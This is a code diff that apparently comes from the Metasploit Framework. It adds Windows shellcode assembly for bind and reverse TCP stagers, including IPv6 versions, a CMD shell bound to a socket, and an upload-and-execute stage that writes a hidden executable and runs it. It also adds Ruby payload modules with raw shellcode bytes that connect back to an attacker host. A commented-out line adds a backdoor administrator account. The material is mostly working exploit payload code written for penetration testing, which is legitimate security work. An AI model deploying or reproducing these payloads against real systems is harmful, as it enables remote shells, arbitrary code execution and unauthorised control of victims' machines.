FN_RECV [ebp + 24] +%define FN_SEND [ebp + 28] +%define FN_ACCEPT [ebp + 32] +%define FN_BIND [ebp + 36] +%define FN_LISTEN [ebp + 40] +%define FN_WSASOCK [ebp + 44] +%define FN_WSASTART [ebp + 48] + +LWSDataSegment: +;======================== +dd 0x190 ; used by wsastartup +dd 0xe71819b6 ; recv [ebp + 24] +dd 0xe97019a4 ; send [ebp + 28] +dd 0x498649e5 ; accept [ebp + 32] +dd 0xc7701aa4 ; bind [ebp + 36] +dd 0xe92eada4 ; listen [ebp + 40] +dd 0xadf509d9 ; WSASocketA [ebp + 44] +dd 0x3bfcedcb ; WSAStartup [ebp + 48] +db "WS2_32", 0x00 +;======================== + +LLoadWinsock: + pop ebx ; save address to data in ebx + lea ecx, [ebx + 32] ; find address of "WS2_32.DLL" + push ecx ; push address of "WS2_32.DLL" + call edi ; call LoadLibraryA("WS2_32.DLL") + mov edi, ebx ; store base of data section in edi + mov ebx, eax ; store base of winsock in ebx + lea esi, [ebp + 20] ; store base of function table + push byte 0x07 ; load five functions by hash + pop ecx ; configure the counter + +Looper: + push ecx ; save the counter + push ebx ; dll handle + push dword [edi + ecx * 4] ; function hash value + call [ebp + 4] ; find the address + pop ecx ; restore the counter + mov [esi + ecx * 4], eax ; stack segment to store addresses + loop Looper + +LWSAStartup: ; WSAStartup (0x101, DATA) + sub esp, [edi] + push esp + push dword [edi] + call FN_WSASTART + xor eax, eax + +LWSASocketA: ; WSASocketA (2,1,0,0,0,0) + push eax + push eax + push eax + push eax + inc eax + push eax + inc eax + push eax + call FN_WSASOCK + mov edi, eax diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_conn.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_conn.asm new file mode 100644 index 0000000000..db9dd86538 --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_conn.asm @@ -0,0 +1,74 @@ +; Title: Win32 Socket Initialization (connect) +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + + + +[BITS 32] + +%include "win32_stage_api.asm" + +sub esp, 0x100 +push eax ; [ebp + 12] = VirtualAlloc +push edi ; [ebp + 8] = LoadLibraryA +push esi ; [ebp + 4] = LGetProcAddress +push ebx ; [ebp + 0] = kernel32.dll base + +mov ebp, esp +call LLoadWinsock + +%define FN_RECV [ebp + 24] +%define FN_SEND [ebp + 28] +%define FN_CONNECT [ebp + 32] +%define FN_WSASOCK [ebp + 36] +%define FN_WSASTART [ebp + 40] + +LWSDataSegment: +;======================== +dd 0x190 ; used by wsastartup +dd 0xe71819b6 ; recv [ebp + 24] +dd 0xe97019a4 ; send [ebp + 28] +dd 0x60aaf9ec ; connect [ebp + 32] +dd 0xadf509d9 ; WSASocketA [ebp + 36] +dd 0x3bfcedcb ; WSAStartup [ebp + 40] +db "WS2_32", 0x00 +;======================== + +LLoadWinsock: + pop ebx ; save address to data in ebx + lea ecx, [ebx + 24] ; find address of "WS2_32.DLL" + push ecx ; push address of "WS2_32.DLL" + call edi ; call LoadLibraryA("WS2_32.DLL") + mov edi, ebx ; store base of data section in edi + mov ebx, eax ; store base of winsock in ebx + lea esi, [ebp + 20] ; store base of function table + push byte 0x05 ; load five functions by hash + pop ecx ; configure the counter + +Looper: + push ecx ; save the counter + push ebx ; dll handle + push dword [edi + ecx * 4] ; function hash value + call [ebp + 4] ; find the address + pop ecx ; restore the counter + mov [esi + ecx * 4], eax ; stack segment to store addresses + loop Looper + +LWSAStartup: ; WSAStartup (0x101, DATA) + sub esp, [edi] + push esp + push dword [edi] + call FN_WSASTART + xor eax, eax + +LWSASocketA: ; WSASocketA (2,1,0,0,0,0) + push eax + push eax + push eax + push eax + inc eax + push eax + inc eax + push eax + call FN_WSASOCK + mov edi, eax diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_conn_udp.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_conn_udp.asm new file mode 100644 index 0000000000..1832017fb4 --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_boot_winsock_conn_udp.asm @@ -0,0 +1,74 @@ +; Title: Win32 Socket Initialization (connect) +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + + + +[BITS 32] + +%include "win32_stage_api.asm" + +sub esp, 0x100 +push eax ; [ebp + 12] = VirtualAlloc +push edi ; [ebp + 8] = LoadLibraryA +push esi ; [ebp + 4] = LGetProcAddress +push ebx ; [ebp + 0] = kernel32.dll base + +mov ebp, esp +call LLoadWinsock + +%define FN_RECV [ebp + 24] +%define FN_SEND [ebp + 28] +%define FN_CONNECT [ebp + 32] +%define FN_WSASOCK [ebp + 36] +%define FN_WSASTART [ebp + 40] + +LWSDataSegment: +;======================== +dd 0x190 ; used by wsastartup +dd 0xe71819b6 ; recv [ebp + 24] +dd 0xe97019a4 ; send [ebp + 28] +dd 0x60aaf9ec ; connect [ebp + 32] +dd 0xadf509d9 ; WSASocketA [ebp + 36] +dd 0x3bfcedcb ; WSAStartup [ebp + 40] +db "WS2_32", 0x00 +;======================== + +LLoadWinsock: + pop ebx ; save address to data in ebx + lea ecx, [ebx + 24] ; find address of "WS2_32.DLL" + push ecx ; push address of "WS2_32.DLL" + call edi ; call LoadLibraryA("WS2_32.DLL") + mov edi, ebx ; store base of data section in edi + mov ebx, eax ; store base of winsock in ebx + lea esi, [ebp + 20] ; store base of function table + push byte 0x05 ; load five functions by hash + pop ecx ; configure the counter + +Looper: + push ecx ; save the counter + push ebx ; dll handle + push dword [edi + ecx * 4] ; function hash value + call [ebp + 4] ; find the address + pop ecx ; restore the counter + mov [esi + ecx * 4], eax ; stack segment to store addresses + loop Looper + +LWSAStartup: ; WSAStartup (0x101, DATA) + sub esp, [edi] + push esp + push dword [edi] + call FN_WSASTART + xor eax, eax + +LWSASocketA: ; WSASocketA (2,2,0,0,0,0) + push eax + push eax + push eax + push eax + inc eax + inc eax + push eax + push eax + call FN_WSASOCK + mov edi, eax diff --git a/external/source/shellcode/windows/msf2/win32_stage_inlineegg.asm b/external/source/shellcode/windows/msf2/win32_stage_inlineegg.asm new file mode 100644 index 0000000000..c052dfae94 --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_inlineegg.asm @@ -0,0 +1,32 @@ + +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + + +[BITS 32] + +LFindGetProcAddress: + push dword [ebp] ; kernel32.dll + push 0x7c0dfcaa ; GetProcAddress + call [ebp + 4] + +LSend: ; send(s, data, len, flags); + push eax ; GetProcAddress + push dword [ebp + 8] ; LoadLibraryA + mov ecx, esp + push byte 0x00 ; flags + push byte 8 ; length + push ecx ; buffer + push edi ; socket + call FN_SEND ; send() + + +LRecvLength: ; recv(s, buff, 4, 0) + sub esp, 4096 + mov ebx, esp + push byte 0x00 ; flags + push 4096 ; length + push ebx ; buffer + push dword edi ; socket + call FN_RECV ; recv() + call ebx diff --git a/external/source/shellcode/windows/msf2/win32_stage_revert.asm b/external/source/shellcode/windows/msf2/win32_stage_revert.asm new file mode 100644 index 0000000000..1d6993515b --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_revert.asm @@ -0,0 +1,19 @@ +; Title: Win32 RevertToSelf Stub +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + + + +[BITS 32] + +call LLoadAdvapi + +LAVDataSegment: +db "ADVAPI32", 0x00 + +LLoadAdvapi + call [ebp + 8] ; call LoadLibraryA("ADVAPI32.DLL") + push eax ; Module base + push 0x50dec82a ; RevertToSelf + call [ebp + 4] ; Find address + call eax ; Call it diff --git a/external/source/shellcode/windows/msf2/win32_stage_shell.asm b/external/source/shellcode/windows/msf2/win32_stage_shell.asm new file mode 100644 index 0000000000..58d3113d2e --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_shell.asm @@ -0,0 +1,78 @@ +; Title: Win32 Network Shell +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + +[BITS 32] + + +; [ebp + 0] = kernel32.dll base +; [ebp + 4] = LGetProcAddress +; [ebp + 8] = LoadLibraryA +; edi = socket + +LSetCommand: + push "CMD" + mov ebx, esp + +LCreateProcessStructs: + xchg edi, edx ; save edi to edx + xor eax,eax ; overwrite with null + lea edi, [esp-84] ; struct sizes + push byte 21 ; 21 * 4 = 84 + pop ecx ; set counter + +LBZero: + rep stosd ; overwrite with null + xchg edi, edx ; restore edi + +LCreateStructs: + sub esp, 84 + mov byte [esp + 16], 68 ; si.cb = sizeof(si) + mov word [esp + 60], 0x0101 ; si.dwflags + + ; socket handles + mov [esp + 16 + 56], edi + mov [esp + 16 + 60], edi + mov [esp + 16 + 64], edi + + lea eax, [esp + 16] ; si + push esp ; pi + push eax + push ecx + push ecx + push ecx + + inc ecx + push ecx + dec ecx + + push ecx + push ecx + push ebx + push ecx + +LCreateProcessA: + push dword [ebp] ; kernel32.dll + push 0x16b3fe72 ; CreateProcessA + call [ebp + 4] + call eax + mov esi, esp + +LWaitForSingleObject: + push dword [ebp] ; kernel32.dll + push 0xce05d9ad ; WaitForSingleObject + call [ebp + 4] + mov ebx, eax + + push 0xFFFFFFFF + push dword [esi] + call ebx + +LDeathBecomesYou: + push dword [ebp] ; kernel32.dll + push 0x73e2d87e ; ExitProcess + call [ebp + 4] + + xor ebx, ebx + push ebx + call eax diff --git a/external/source/shellcode/windows/msf2/win32_stage_uploadexec.asm b/external/source/shellcode/windows/msf2/win32_stage_uploadexec.asm new file mode 100644 index 0000000000..7bc1e962a7 --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_uploadexec.asm @@ -0,0 +1,174 @@ +; Title: Win32 Network Shell +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + +[BITS 32] + +%ifndef FN_RECV + %define FN_RECV [ebp + 24] +%endif + +%define BLOCKSZ 32 + + +; [ebp + 0] = kernel32.dll base +; [ebp + 4] = LGetProcAddress +; [ebp + 8] = LoadLibraryA +; edi = socket + + +; ebx = handle of temp file +; esi = bytes left to read +; [ebp+100] = CreateFileA +; [ebp+104] = WriteFile +; [ebp+108] = CloseHandle +; [ebp+112] = file name +; [ebp+116] = recv buffer +; [ebp+120] = remaining bytes +; [ebp+124] = storage space + + +LLoadFileAPI: + push dword [ebp] + push 0x7c0017a5 ; CreateFileA + call [ebp + 4] + mov [ebp+100], eax + push dword [ebp] + push 0xe80a791f ; WriteFile + call [ebp + 4] + mov [ebp+104], eax + push dword [ebp] + push 0x0ffd97fb ; CloseHandle + call [ebp + 4] + mov [ebp+108], eax + +LReadFileLength: ; recv(s, buff, 4, 0) + lea eax, [ebp+120] + push byte 0x00 ; flags + push 4 ; length + push eax ; buffer + push dword edi ; socket + call FN_RECV ; recv() + mov eax, [ebp+120] ; remaining bytes + + call LGetFileName ; get ptr to file name + +; temporary file name +db "C:\metasploit.exe", 0x00 + +LGetFileName: + pop ecx + mov [ebp+112], ecx + +LCreateFile: + + push byte 0 ; template + push byte 6 ; FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM + push byte 4 ; OPEN_ALWAYS + push byte 0 ; lpSecurityAttributes=null + push byte 7 ; FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE; + push 0xe0000000 ; GENERIC_EXECUTE | GENERIC_READ | GENERIC_WRITE + push ecx ; file name + call [ebp+100] + mov ebx, eax ; Handle in ebx + +LConfigBuffer: + ; lea eax, [esp-BLOCKSZ-200] ; leave some room + sub esp, BLOCKSZ - 200 + +; shr eax, 2 +; shl eax, 2 + mov [ebp+116], esp ; store it away + +LReadSocket: ; recv(s, buff, 4096, 0) + mov eax, [ebp+116] ; recv buffer ptr + push byte 0x00 ; flags + push BLOCKSZ ; length + push eax ; buffer + push dword edi ; socket + call FN_RECV ; recv() + mov ecx, [ebp+120] ; remaining bytes + sub ecx, eax ; subtract recv + mov [ebp+120], ecx ; put it back + +LWriteFile: + push esp ; create storage + mov ecx, esp ; get storage space + push byte 0 ; not overlapped + push ecx ; &written + push eax ; recv len + push dword [ebp+116] ; source buffer + push ebx ; file handle + call [ebp+104] ; WriteFile + pop ecx ; remove storage + + mov eax, [ebp+120] ; remaining bytes + test eax, eax ; are we at zero? + jnz LReadSocket ; go read some more + +LCloseHandle: + push ebx + call [ebp+108] + +LCreateProcessStructs: + xchg edi, edx ; save edi to edx + xor eax,eax ; overwrite with null + lea edi, [esp-84] ; struct sizes + push byte 21 ; 21 * 4 = 84 + pop ecx ; set counter + +LBZero: + rep stosd ; overwrite with null + xchg edi, edx ; restore edi + +LCreateStructs: + sub esp, 84 + mov byte [esp + 16], 68 ; si.cb = sizeof(si) + mov word [esp + 60], 0x0101 ; si.dwflags + + ; socket handles + mov [esp + 16 + 56], edi + mov [esp + 16 + 60], edi + mov [esp + 16 + 64], edi + + lea eax, [esp + 16] ; si + push esp ; pi + push eax + push ecx + push ecx + push ecx + + inc ecx + push ecx + dec ecx + + push ecx + push ecx + push dword [ebp+112] + push ecx + +LCreateProcessA: + push dword [ebp] ; kernel32.dll + push 0x16b3fe72 ; CreateProcessA + call [ebp + 4] + call eax + mov esi, esp + +LWaitForSingleObject: + push dword [ebp] ; kernel32.dll + push 0xce05d9ad ; WaitForSingleObject + call [ebp + 4] + mov ebx, eax + + push 0xFFFFFFFF + push dword [esi] + call ebx + +LDeathBecomesYou: + push dword [ebp] ; kernel32.dll + push 0x73e2d87e ; ExitProcess + call [ebp + 4] + + xor ebx, ebx + push ebx + call eax diff --git a/external/source/shellcode/windows/msf2/win32_stage_winexec.asm b/external/source/shellcode/windows/msf2/win32_stage_winexec.asm new file mode 100644 index 0000000000..eeb4cc3364 --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_winexec.asm @@ -0,0 +1,34 @@ +; Title: Win32 Socket Initialization +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: hdm[at]metasploit.com + + +[BITS 32] + +%include "win32_stage_api.asm" + +jmp short GetCMD + +WinExec: + push ebx + push 0x0e8afe98 + call esi + call eax + + +ExitProcess: + push ebx + push 0x73e2d87e + call esi + push byte 0 + call eax + call eax + + +GetCMD: + push byte 0 ; last arg of WinExec + call WinExec + +; The command to execute +;db "cmd.exe /c net user X X /ADD && net localgroups Administrators X /ADD" +;db 0x00 diff --git a/external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm b/external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm new file mode 100644 index 0000000000..68d66bfc52 --- /dev/null +++ b/external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm @@ -0,0 +1,230 @@ +; Title: Windows Bind Stager (NX, IPv6) +; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 +; Author: Metasploit LLC + +[BITS 32] + +global _start +_start: + + call LKernel32Base + +LGetProcAddress: + push ebx + push ebp + push esi + push edi + mov ebp, [esp + 24] + mov eax, [ebp + 0x3c] + mov edx, [ebp + eax + 120] + add edx, ebp + mov ecx, [edx + 24] + mov ebx, [edx + 32] + add ebx, ebp + +LFnlp: + jecxz LNtfnd + dec ecx + mov esi, [ebx + ecx * 4] + add esi, ebp + xor edi, edi + cld + +LHshlp: + xor eax, eax + lodsb + cmp al, ah + je LFnd + ror edi, 13 + add edi, eax + jmp short LHshlp + +LFnd: + cmp edi, [esp + 20] + jnz LFnlp + mov ebx, [edx + 36] + add ebx, ebp + mov cx, [ebx + 2 * ecx] + mov ebx, [edx + 28] + add ebx, ebp + mov eax, [ebx + 4 * ecx] + add eax, ebp + jmp short LDone + +LNtfnd: + xor eax, eax + +LDone: + pop edi + pop esi + pop ebp + pop ebx + ret 8 + +LKernel32Base: + pop esi + push byte 0x30 + pop ecx + mov ebx, [fs:ecx] + mov ebx, [ebx + 0x0c] + mov ebx, [ebx + 0x1c] + mov ebx, [ebx] + mov ebx, [ebx + 0x08] + + push ebx ; kernel32.dll base + push dword 0xec0e4e8e ; LoadLibraryA + call esi ; GetProcAddress(kerne32.dll, LoadLibrary) + mov edi, eax + + push ebx ; kernel32.dll base + push dword 0x91afca54 ; VirtualAlloc + call esi ; GetProcAddress(kerne32.dll, VirtualAlloc) + + ; ebx = kernel32.dll base + ; esi = LGetProcAddress + ; edi = LoadLibraryA + ; eax = VirtualAlloc + +sub esp, 0x100 +push eax ; [ebp + 12] = VirtualAlloc +push edi ; [ebp + 8] = LoadLibraryA +push esi ; [ebp + 4] = LGetProcAddress +push ebx ; [ebp + 0] = kernel32.dll base + +mov ebp, esp +call LLoadWinsock + +%define FN_RECV [ebp + 24] +%define FN_SEND [ebp + 28] +%define FN_ACCEPT [ebp + 32] +%define FN_BIND [ebp + 36] +%define FN_LISTEN [ebp + 40] +%define FN_WSASOCK [ebp + 44] +%define FN_WSASTART [ebp + 48] + +LWSDataSegment: +;======================== +dd 0x190 ; used by wsastartup +dd 0xe71819b6 ; recv [ebp + 24] +dd 0xe97019a4 ; send [ebp + 28] +dd 0x498649e5 ; accept [ebp + 32] +dd 0xc7701aa4 ; bind [ebp + 36] +dd 0xe92eada4 ; listen [ebp + 40] +dd 0xadf509d9 ; WSASocketA [ebp + 44] +dd 0x3bfcedcb ; WSAStartup [ebp + 48] +db "WS2_32", 0x00 +;======================== + +LLoadWinsock: + pop ebx ; save address to data in ebx + lea ecx, [ebx + 32] ; find address of "WS2_32.DLL" + push ecx ; push address of "WS2_32.DLL" + call edi ; call LoadLibraryA("WS2_32.DLL") + mov edi, ebx ; store base of data section in edi + mov ebx, eax ; store base of winsock in ebx + lea esi, [ebp + 20] ; store base of function table + push byte 0x07 ; load five functions by hash + pop ecx ; configure the counter + +Looper: + push ecx ; save the counter + push ebx ; dll handle + push dword [edi + ecx * 4] ; function hash value + call [ebp + 4] ; find the address + pop ecx ; restore the counter + mov [esi + ecx * 4], eax ; stack segment to store addresses + loop Looper + +LWSAStartup: ; WSAStartup (0x0202, DATA) + sub esp, [edi] + push esp + push dword 0x0202 + call FN_WSASTART + xor eax, eax + +LWSASocketA: ; WSASocketA (23,1,6,0,0,0) + ; dwFlags + push eax + + ; RESERVED + push eax + + ; PROTOCOL INFO + push eax + + ; PROTOCOL: IPPROTO_TCP + push byte 6 + + ; TYPE: SOCK_STREAM + push byte 1 + + ; FAMILY: AF_INET6 + push byte 23 + + ; WSASocket() + call FN_WSASOCK + mov edi, eax + +LBind: + + ; sin6_scope_id + push dword 0x00000000 + xor ecx, ecx + + ; sin6_addr = ::0 + push ecx + push ecx + push ecx + push ecx + + ; sin6_flowinfo + push ecx + + ; sin6_port / sin6_family + push dword 0xffff0017 + + mov ecx, esp + + push byte 28 ; length + push ecx + push edi + call FN_BIND + + xor ebx, ebx + +LListen: + push ebx + push edi + call FN_LISTEN + +LAccept: + push ebx + push ebx + push edi + call FN_ACCEPT + mov edi, eax + +LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE) + + push byte 0x40 + pop esi + push esi ; PAGE_EXECUTE_READWRITE=0x40 + + shl esi, 6 ; MEM_COMMIT=0x1000 + push esi + + shl esi, 8 ; 1MB + push esi + + push byte 0x00 ; NULL + call [ebp+12] + mov ebx, eax + + +LRecvLength: ; recv(s, buff, 4, 0) + push byte 0x00 ; flags + push dword 4096 ; length + push ebx ; buffer + push dword edi ; socket + call FN_RECV ; recv() + call ebx diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb index 5db4bdd9a9..5b08379418 100644 --- a/lib/msf/core/handler/reverse_tcp.rb +++ b/lib/msf/core/handler/reverse_tcp.rb @@ -57,8 +57,12 @@ module ReverseTcp raise 'tcp connectback can not be used with proxies' end + # Switch to IPv6 ANY address if the LHOST is also IPv6 + addr = Rex::Socket.resolv_nbo(datastore['LHOST']) + lsnr = (addr.length == 4) ? "0.0.0.0" : "::0" + self.listener_sock = Rex::Socket::TcpServer.create( - # 'LocalHost' => datastore['LHOST'], + 'LocalHost' => lsnr, 'LocalPort' => datastore['LPORT'].to_i, 'Comm' => comm, 'Context' => diff --git a/lib/msf/core/payload.rb b/lib/msf/core/payload.rb index ced3a0ebfd..b87273cb53 100644 --- a/lib/msf/core/payload.rb +++ b/lib/msf/core/payload.rb @@ -267,9 +267,10 @@ class Payload < Msf::Module # # Supprted packing types: # - # - ADDR (foo.com, 1.2.3.4) - # - HEX (0x12345678, "\x41\x42\x43\x44") - # - RAW (raw bytes) + # - ADDR (foo.com, 1.2.3.4) + # - ADDR6 (foo.com, fe80::1234:5678:8910:1234) + # - HEX (0x12345678, "\x41\x42\x43\x44") + # - RAW (raw bytes) # def substitute_vars(raw, offsets) offsets.each_pair { |name, info| @@ -282,6 +283,19 @@ class Payload < Msf::Module if ((val = datastore[name])) if (pack == 'ADDR') val = Rex::Socket.resolv_nbo(val) + + # Someone gave us a funky address (ipv6?) + if(val.length == 4) + raise RuntimeError, "IPv6 address specified for IPv4 payload" + end + elsif (pack == 'ADDR6') + val = Rex::Socket.resolv_nbo(val) + + # Convert v4 to the v6ish address + if(val.length == 4) + nip = "fe80::5efe:" + val.unpack("C*").join(".") + val = Rex::Socket.resolv_nbo(val) + end elsif (pack == 'RAW') # Just use the raw value... else diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb new file mode 100644 index 0000000000..7847754e2b --- /dev/null +++ b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb @@ -0,0 +1,75 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + + +require 'msf/core' +require 'msf/core/handler/bind_tcp' + +module Msf +module Payloads +module Stagers +module Windows + +module BindTcpIPv6 + + include Msf::Payload::Stager + include Msf::Payload::Windows + + def self.handler_type_alias + "bind_ipv6_tcp" + end + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Bind TCP Stager (IPv6)', + 'Version' => '$Revision$', + 'Description' => 'Listen for a connection over IPv6', + 'Author' => ['hdm', 'skape'], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::BindTcp, + 'Convention' => 'sockedi', + 'Stager' => + { + 'Offsets' => + { + 'LPORT' => [ 253+1, 'n' ], + }, + 'Payload' => + "\xfc"+ + "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"+ + "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"+ + "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"+ + "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+ + "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+ + "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+ + "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"+ + "\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"+ + "\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00"+ + "\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xe5\x49\x86\x49"+ + "\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b"+ + "\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf"+ + "\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04"+ + "\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\x68\x02\x02\x00\x00\xff\x55"+ + "\x30\x31\xc0\x50\x50\x50\x6a\x06\x6a\x01\x6a\x17\xff\x55\x2c\x89"+ + "\xc7\x6a\x00\x31\xc9\x51\x51\x51\x51\x51\x68\x17\x00\xff\xff\x89"+ + "\xe1\x6a\x1c\x51\x57\xff\x55\x24\x31\xdb\x53\x57\xff\x55\x28\x53"+ + "\x53\x57\xff\x55\x20\x89\xc7\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1"+ + "\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00"+ + "\x00\x53\x57\xff\x55\x18\xff\xd3" + } + )) + end + +end + +end end end end diff --git a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb new file mode 100644 index 0000000000..54b24a002e --- /dev/null +++ b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb @@ -0,0 +1,81 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp' + +module Msf +module Payloads +module Stagers +module Windows + +module ReverseTcpIPv6 + + include Msf::Payload::Stager + include Msf::Payload::Windows + + + def self.handler_type_alias + "reverse_ipv6_tcp" + end + + def initialize(info = {}) + + super(merge_info(info, + 'Name' => 'Reverse TCP Stager (IPv6)', + 'Version' => '$Revision$', + 'Description' => 'Connect back to the attacker over IPv6', + 'Author' => ['hdm', 'skape'], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::ReverseTcp, + 'Convention' => 'sockedi', + 'Stager' => + { + 'Offsets' => + { + 'LHOST' => [ 246+1, 'ADDR6' ], + 'LPORT' => [ 240+1, 'n' ], + 'SCOPEID' => [ 262+1, 'V' ] + }, + 'Payload' => + "\xfc" + + "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"+ + "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"+ + "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"+ + "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+ + "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+ + "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+ + "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"+ + "\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"+ + "\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00"+ + "\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60"+ + "\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"+ + "\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59"+ + "\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"+ + "\x54\x68\x02\x02\x00\x00\xff\x55\x28\x31\xc0\x50\x50\x50\x6a\x06"+ + "\x6a\x01\x6a\x17\xff\x55\x24\x89\xc7\xe8\x1c\x00\x00\x00\x17\x00"+ + "\xff\xff\x00\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00"+ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x59\x6a\x1c\x51\x57\xff"+ + "\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00"+ + "\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57\xff\x55\x18\xff\xd3" + } + )) + register_options( + [ + OptInt.new("SCOPEID", [false, "The IPv6 Scope ID, required for link-layer addresses", 0]) + ], self.class) + end + +end + +end end end end